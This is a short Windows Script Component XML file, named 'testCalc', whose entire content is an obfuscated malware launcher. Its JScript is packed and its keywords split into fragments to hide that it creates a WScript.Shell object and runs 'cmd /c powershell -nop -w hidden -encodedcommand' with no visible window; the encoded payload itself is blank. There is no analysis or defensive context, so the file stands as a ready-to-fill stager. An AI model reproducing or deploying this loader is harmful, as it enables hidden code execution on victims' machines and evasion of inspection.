<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4{5 1=6 7("2.3");1.d("b /c 8 ",0)}9(a){}',14,14,('|WshSh'+'ell|WSc'+'ript|She'+'ll|try|var|new|Acti'+'veXObject|powe'+'rshe'+'ll -n'+'op -w hi'+'dden -encod'+'edcom'+'mand |catch|ex|cm'+'d||Run').split('|'),0,{}))



]]>
</script>

</component>
</package>
